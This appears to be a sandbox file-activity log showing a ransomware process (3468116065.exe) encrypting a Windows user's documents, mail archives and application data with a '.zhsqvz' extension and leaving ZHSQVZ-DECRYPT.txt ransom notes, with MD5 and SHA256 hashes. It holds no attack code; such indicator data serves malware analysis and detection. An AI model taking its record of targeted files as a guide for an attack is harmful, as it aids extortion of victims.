C:\Users\admin\Favorites\MSN Websites\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\Favorites\MSN Websites\MSN Autos.url.zhsqvz
binary
MD5: 6b11baea8d52da8ec888ded732a47148
SHA256: 08dfb0caa5573c722af3706504b34922ffad8799f91c8019f4febb170cd7983f
2180
3468116065.exe
C:\Users\admin\Favorites\MSN Websites\MSN Autos.url
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Favorites\MSN Websites\MSN Money.url
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Favorites\MSN Websites\MSN Entertainment.url
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Home.url.zhsqvz
binary
MD5: a3ac5ef5fa82a72aa1cbb775181f73af
SHA256: 2443d64a492d370ad2e4d2f504ea194d766e8b2c3bab019fa658d326babe4ab2
2180
3468116065.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Work.url.zhsqvz
binary
MD5: add250c6655456bd625bf98083b2973f
SHA256: f743db0e4ca48ca9c2771015635cff3d642bd55cde63852b9d1877c0293dc2a1
2180
3468116065.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft Store.url.zhsqvz
binary
MD5: 8ce5c984b5774d9a019fb3cfc119218d
SHA256: 5abef4ff24bf3f401c295cdbfd5cc7666bca3d7b4169d6434c97c28ef391bc0c
2180
3468116065.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft Store.url
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Work.url
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Home.url
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Favorites\Microsoft Websites\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\Favorites\Microsoft Websites\IE Add-on site.url.zhsqvz
binary
MD5: e55969b1d38357a51ddc02d3d4ee2fea
SHA256: fa96dd1a2210c1626b19e6f3abaeb675ff04f04f2e83152eb6b276384ccc7fdf
2180
3468116065.exe
C:\Users\admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url.zhsqvz
binary
MD5: f4ffcf7ae4ab1d0908613af083d79b9a
SHA256: 1b84684cd4b775023c34309fcee3fe7c89d2c2c3751aca378f48f05c6e35c899
2180
3468116065.exe
C:\Users\admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Favorites\Microsoft Websites\IE Add-on site.url
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Favorites\Links for United States\USA.gov.url.zhsqvz
binary
MD5: 1696b07bb4e2ac3b1f3526a3577f4385
SHA256: c6d017f167e3dd16ccd0d98c5a024682f8a9d20d98b9efe47cd5a6d1bdb75bfd
2180
3468116065.exe
C:\Users\admin\Favorites\Links for United States\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\Favorites\Links for United States\GobiernoUSA.gov.url.zhsqvz
binary
MD5: d0fb9220f5a2a13258b4eb8d482bd76b
SHA256: 140ec2d3a920c11f037adf1628133291b281393de385a8d2a8795875974fba8d
2180
3468116065.exe
C:\Users\admin\Favorites\Links\Web Slice Gallery.url.zhsqvz
binary
MD5: 2b6055a56d64e52b437e27ceaf939464
SHA256: a42cef5de42696b3ccc2a54e32dbd9d8e02ffe1f3e4016b2a4be1b74e18500cf
2180
3468116065.exe
C:\Users\admin\Favorites\Links for United States\USA.gov.url
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Favorites\Links\Web Slice Gallery.url
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Favorites\Links for United States\GobiernoUSA.gov.url
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Favorites\Links\Suggested Sites.url.zhsqvz
binary
MD5: f3b6d077f4b163f59df7e22854aa2c86
SHA256: 6f030b81cf7104b93a9c7f3414676b345dd80053a8f13dedacb60ae8c5ef61b1
2180
3468116065.exe
C:\Users\admin\Favorites\Links\Suggested Sites.url
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Favorites\Links\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\Downloads\tvcomputers.jpg.zhsqvz
binary
MD5: ef6ca5409f9cf1d079e3f2c943170c66
SHA256: f858aee1741f10cd5f4e5aa1173446f04abc57c60e9777c48e0adf834f1e3f92
2180
3468116065.exe
C:\Users\admin\Favorites\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\Downloads\tvcomputers.jpg
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Downloads\nudedecember.jpg.zhsqvz
binary
MD5: 9ea502ea3f357c62c95783d90a4bd0a0
SHA256: 5f650841bd49e106de960febbe60324d1a3374e9e5cd2c9a2ab5d6a9f9bef9e9
2180
3468116065.exe
C:\Users\admin\Downloads\paypalbenefit.png.zhsqvz
binary
MD5: 68af37a1691c3d71d040e9f07422a924
SHA256: a1a8a2eb53bf82a2db1207fea57d3bea914267f5c881063e55bd0783445933e6
2180
3468116065.exe
C:\Users\admin\Downloads\nudedecember.jpg
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Downloads\paypalbenefit.png
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Downloads\mapsoperating.png.zhsqvz
binary
MD5: 650a12522603e6f6dc8a46d45dccb956
SHA256: ada4ae55adf007aacb16292219299791d0ba89fe5ad3f939735e63ac02dab053
2180
3468116065.exe
C:\Users\admin\Downloads\hereglobal.jpg.zhsqvz
binary
MD5: 34dad3fc37a66af3c7916202de6f2a72
SHA256: 329950cd18ae96df9180aa7e4215d32236c2fce02a7ce5958ec72ff813fc3427
2180
3468116065.exe
C:\Users\admin\Downloads\hereglobal.jpg
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Downloads\mapsoperating.png
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Downloads\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\Documents\weatherhardcore.rtf.zhsqvz
binary
MD5: 27a0064bfc1396bcb190dba0a9c5779a
SHA256: 21022369598725cceec2b4e42a9a8ee41f06a6f56182525a8d821811a08b9e4a
2180
3468116065.exe
C:\Users\admin\Documents\xgreater.rtf.zhsqvz
binary
MD5: 2344407d11a7713158018d043fb3c534
SHA256: 95bc8fa6167d5a947fdaaafa8a87b561c0ca1817a95be1b14c2251b9c4d2bf80
2180
3468116065.exe
C:\Users\admin\Documents\weatherhardcore.rtf
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Documents\xgreater.rtf
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Documents\Outlook Files\Outlook.pst.zhsqvz
binary
MD5: c67ba27f9a90242ce65f7409fefcbbb3
SHA256: b583956ef400999647e1d0e62edf0d48a6b61573a20107a0231af7496d4c3ba1
2180
3468116065.exe
C:\Users\admin\Documents\tuesdaytue.rtf.zhsqvz
binary
MD5: 547c5fc5294d1870a133b086b93d400f
SHA256: 6081bb0d64961a5aee724ec03f16c091a40e94fefd8e658fc2e6ba4a0abf7721
2180
3468116065.exe
C:\Users\admin\Documents\Outlook Files\~Outlook.pst.tmp.zhsqvz
vc
MD5: dc4415580b769fba604eb0ec14785de7
SHA256: b750e15e4ec7d43a2de3797e90e4abbe9f2c4fc06baf15905d43f946688e6971
2180
3468116065.exe
C:\Users\admin\Documents\tuesdaytue.rtf
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Documents\Outlook Files\Outlook.pst
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Documents\Outlook Files\~Outlook.pst.tmp
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Documents\Outlook Files\Outlook Data File - test.pst.zhsqvz
binary
MD5: d6df1fc1586cf72c24862d83a9129280
SHA256: d3684c852b644cbb4c00d249ec556eb038677bbea78dc02903a80dfacc30968f
2180
3468116065.exe
C:\Users\admin\Documents\Outlook Files\Outlook Data File - NoMail.pst.zhsqvz
binary
MD5: ca0118670fbbf16f6cef2b0fe2dfd8d9
SHA256: c6c875019c2ebf408f2c92efe6747fe3d3b1192166608a03534d811679c2b16b
2180
3468116065.exe
C:\Users\admin\Documents\Outlook Files\Outlook Data File - NoMail.pst
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Documents\Outlook Files\Outlook Data File - test.pst
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\Unfiled Notes.one.zhsqvz
binary
MD5: b20d711569ee711a6178c187e9fa82cc
SHA256: 387adb84f48ae820f17007b79a1a1a080af9efeb1d3c1922d82bbdb873e032e4
2180
3468116065.exe
C:\Users\admin\Documents\Outlook Files\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\Documents\Outlook Files\[email protected]
binary
MD5: 741c57e411d0450d72a6b3d41ceff529
SHA256: 53c1b612a96a793592802d8e4666618d5b3b44b67c553ebafbb5cde39ca48067
2180
3468116065.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\Open Notebook.onetoc2.zhsqvz
binary
MD5: b5c42e68a53ff3f936200d7d35af991a
SHA256: 569cccc5b337fb19c563d68816d122f350f22d85945ba3be945e4f9d716b8ef3
2180
3468116065.exe
C:\Users\admin\Documents\Outlook Files\[email protected]
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\Open Notebook.onetoc2
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\Unfiled Notes.one
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\General.one.zhsqvz
binary
MD5: 1700f88f57bbd3b084e6342db12d83f1
SHA256: 024116701aad27ef8204fa93258666e5114b1bcc8e283b2f774439ca82dfed4a
2180
3468116065.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\General.one
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\Music\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\Documents\OneNote Notebooks\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\Videos\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\Pictures\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\Documents\iephone.rtf.zhsqvz
binary
MD5: a3baab632eb488f2c349ed458ee07543
SHA256: 2b7b8a4c84aac24cdc07b235245e9e4ad95d4b64ee15810c063a390f5a46f233
2180
3468116065.exe
C:\Users\admin\Documents\iephone.rtf
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Documents\estwhile.rtf.zhsqvz
binary
MD5: 0244e6a17526fc92d15051bb4af0470a
SHA256: 53cbf5482d0984bd29d509bba1ee308ace43084038892416891879d804838723
2180
3468116065.exe
C:\Users\admin\Documents\employeesupon.rtf.zhsqvz
binary
MD5: 8903e37afc73ab6c32f31bdd8d7c7eb1
SHA256: e21083e4726f35f4a52ba979900534f8b6e683f751390c9b700e8a63287abc1b
2180
3468116065.exe
C:\Users\admin\Documents\estwhile.rtf
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Documents\employeesupon.rtf
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Documents\beensouth.rtf.zhsqvz
binary
MD5: a95bdd39dba725c772dbe0e865cd53ef
SHA256: 106b3a46dbd434fea7e4826993cf64fe91a0de294e156c280c8e678eb98b0709
2180
3468116065.exe
C:\Users\admin\Documents\beensouth.rtf
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Documents\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\Desktop\stocktoday.png.zhsqvz
binary
MD5: a8a622ab135750a8907985ea8c651a5b
SHA256: 7af6098f8f3039ea1163ef2b2bd1858c092994b097bc775830df2701d3a42aaa
2180
3468116065.exe
C:\Users\admin\Desktop\stocktoday.png
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Desktop\providesupplies.png.zhsqvz
binary
MD5: 806288609134a4a685629207e77a66e8
SHA256: eac21b5ec9744ffe23d6eed48251639fc6deb39e8ddcc43ec4d501b1f71fab12
2180
3468116065.exe
C:\Users\admin\Desktop\providesupplies.png
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Desktop\modelmonday.rtf.zhsqvz
binary
MD5: b02b9705fd90f43f246ffeeeb94787f7
SHA256: 533ce50a7e2c4698122bc08c96876d504f2fb4f9c9edb797d7276869bc40efee
2180
3468116065.exe
C:\Users\admin\Desktop\modelmonday.rtf
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Desktop\menhp.png.zhsqvz
binary
MD5: a3c8eea6b92cb51226642003af7d31c1
SHA256: 3443cdb8cf82f0149e64cf82926661fa2f4b04252d25154c82ecb71145adbc55
2180
3468116065.exe
C:\Users\admin\Desktop\menhp.png
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Desktop\leadingspecific.rtf.zhsqvz
binary
MD5: da6fe423727fa99e8a4900732202672f
SHA256: 1000b1379c36d26ba7c2b7c11342736300caf698492ddae5c2b94e6181a74a6b
2180
3468116065.exe
C:\Users\admin\Desktop\Love_You_2019_33235120-txt.js.zhsqvz
binary
MD5: b8fa1534ac667abb01aad500d13025a5
SHA256: a08b74a5a7f46d14b8b640754ea6d391c9c4f5d43d2b7c13035d9ca61acdee80
2180
3468116065.exe
C:\Users\admin\Desktop\leadingspecific.rtf
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Desktop\Love_You_2019_33235120-txt.js
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Desktop\coloradoproperty.rtf.zhsqvz
binary
MD5: 0bf7f005c5e86c2aeafcead468350b71
SHA256: 263518aab51560ccc32f931244a95b52a0da167a377d982ddfd958c2d9de4012
2180
3468116065.exe
C:\Users\admin\Desktop\allsimple.rtf.zhsqvz
binary
MD5: 474b5fdf0ce689be6bb04b0910f4d999
SHA256: c3068f0cd779c19e7db3273501336a807f2f1665ca1306396e986810aed8f48e
2180
3468116065.exe
C:\Users\admin\Desktop\coloradoproperty.rtf
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Desktop\allsimple.rtf
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Desktop\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\Contacts\admin.contact.zhsqvz
binary
MD5: 854ad5c0437e4c381020129ddaa474ce
SHA256: 28aa79786f38b38581593ed96349fc35f0d1633b7001ce808e940385ad35a381
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\Desktop\albumturn.rtf.zhsqvz
binary
MD5: e517bf7dc303ca82fb48713eee46f4a2
SHA256: 2a8bdd3e223606a74983d2d428ca02a42bccb3110c6874ac1afa1fa5b01219e8
2180
3468116065.exe
C:\Users\admin\Desktop\albumturn.rtf
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\Contacts\admin.contact
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\WinRAR\version.dat.zhsqvz
binary
MD5: cbad6b55eff4dc3ddd0c91d403010334
SHA256: 9e766fdf5ac87884ce2f7ed64fb80099db06c3440fe70dc6a530fab04243602f
2180
3468116065.exe
C:\Users\admin\Contacts\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
text
MD5: d1c66003c1cdfdc3a710cf501a2868a5
SHA256: 50be2a0ae8f4da16eb0a3575b6869f5d4efe38ddc34a8340381a397e3b00854b
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\WinRAR\version.dat
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Sun\Java\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Sun\Java\Deployment\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ul.conf.zhsqvz
binary
MD5: a00c7c03979a1974a0539a2b4b1296d1
SHA256: c306a57b33fb209375493f1549f850560efe3ff038db3a67c7a06e71494ab172
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\WinRAR\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Sun\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ul.conf
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ecs.conf.zhsqvz
binary
MD5: 98de03ee1417743f4b7ae012acaa1206
SHA256: d65fc4e673ac1cfbbe963cae92155f673153567ff8870b451f38af9bf4960d3c
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\skypert.conf.zhsqvz
binary
MD5: 9eb0e9cb1f0bb1e71290f96dff647b1c
SHA256: 002e3eee20b2b4cb675580ee3a454e92fad389f446b16dd4a669dc15875fc55f
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ecs.conf
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Skype\SkypeRT\skypert.conf
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Skype\shared_httpfe\queue.db.zhsqvz
binary
MD5: 2995add70f91899928d0b863d74a0aa3
SHA256: 343ce2a05c6dbba327d7c5036897f6401f645700db5c922170179c30eb76ebe1
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Skype\shared_httpfe\queue.db
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db.zhsqvz
binary
MD5: 66aef2caff1d4cab71526e72472f9510
SHA256: e71189d6ebc2cc957d6e8d5d4a2c40a98b644eebc4f602f797eccb59b414913f
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Skype\shared_httpfe\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db-journal.zhsqvz
binary
MD5: 5a7384349c8c54648d53bdb4c29d459e
SHA256: 8cbf9ea80cfc36fe0c1d7c3137744a0cf0ee4b8eca2ab653b47b611de69b69da
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db-journal
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Skype\shared_dynco\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Skype\shared.xml.zhsqvz
binary
MD5: 10b2c9ec63d9c9cd00f1942962dceb16
SHA256: 1c8124d0538adbe766fc9d531c30ba6ab39d85a5a5f6ad4f3573984e45ccc682
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Skype\shared.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Skype\logs\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Skype\DataRv\offline-storage.data.zhsqvz
binary
MD5: 47c37da4b9701091f64962640d2ba4b7
SHA256: f437f1af02f46765e88817e116ce336c06770d2ed3a49f61cf60fe4e4159c994
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Skype\DataRv\offline-storage.data
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Skype\DataRv\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\users.xml.zhsqvz
binary
MD5: 72e3fc029a904939925014deca380fa8
SHA256: 2380ebe5246902d0e629b7844aa51323d6157a0724de397e90682ec8d66177b3
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\wand.dat.zhsqvz
binary
MD5: f066189161b81acc8893cdd2c1d6c205
SHA256: a61fe93553d889f6777f24cdb81ebe222dbe523db11fc3533b05860bae772aee
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\vlink4.dat.zhsqvz
binary
MD5: af25c392f1765642a894754fba9b1bc7
SHA256: d76f1ea551d1e9eca7832438d60ceee9675c3601ef006850f521db373c12c26f
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Skype\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\webserver\users.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\wand.dat
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\vlink4.dat
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\typed_history.xml.zhsqvz
binary
MD5: d17a35753ccade3e15cfaed85fca7960
SHA256: 5d5cc0f1f499dcee4f1d0719b296dcdc2ff4d326573b86e4789a750fe46ab369
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\tips.ini.zhsqvz
binary
MD5: 91a28133db751ee81f7a6d7c35a7cda7
SHA256: 8d9e9b9b3a8452469f0d395e86457e59096c51b774f9a72fab006e8599449e7d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\tasks.xml.zhsqvz
binary
MD5: 6e8ed6586f2514996e9907f54e135b9c
SHA256: 30c68aaab759e29301dd3238e2a8e8ddfa08a0396670fe8874e8e9c5692a4624
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\tips.ini
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\typed_history.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\tasks.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\toc.css.zhsqvz
binary
MD5: 86837d2459cb6bf8e597ba0f9e7ad6b3
SHA256: 1ad250613d949b2f8e4e5146a7688868f52257a9465044154cac2ba7679b2729
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\tablelayout.css.zhsqvz
binary
MD5: 81a6797bbb09bbe9998b3d71ca598a3a
SHA256: 374c8a636d1f8a136b3b0b0874b682345f5dad009d5d1c68d39c5cc37c24be52
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\toc.css
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\tablelayout.css
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structuretables.css.zhsqvz
binary
MD5: cef962f387dd73def52406d8ba3da5ea
SHA256: 5dd21d02732dc5af2993d12954487b7c78193ed0e498eae9152a20e08a3f9594
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureinline.css.zhsqvz
binary
MD5: 69497649880bfb4ab35c60921a714f40
SHA256: df698c92e0032e8ee66d36b5387cee8edfe79f021b0652352572b570306e9824
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureinline.css
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structuretables.css
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\outline.css.zhsqvz
binary
MD5: d96f5d4e8b06cec16e324b5160d5cae3
SHA256: b5f75fc38981edad77d0f64dcf421cd74c07ff4a41aaffcef319046fd416c1e8
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Opera\Opera\styles\user\structureblock.css.zhsqvz
binary
MD5: fb37215a71c324165004faf64ee7df2e
SHA256: 0dada7f08d8902222f10d7ad2eab0ef5b2e605f8503a09f6766abb17f3f6fa06
2180
3468116065.exe
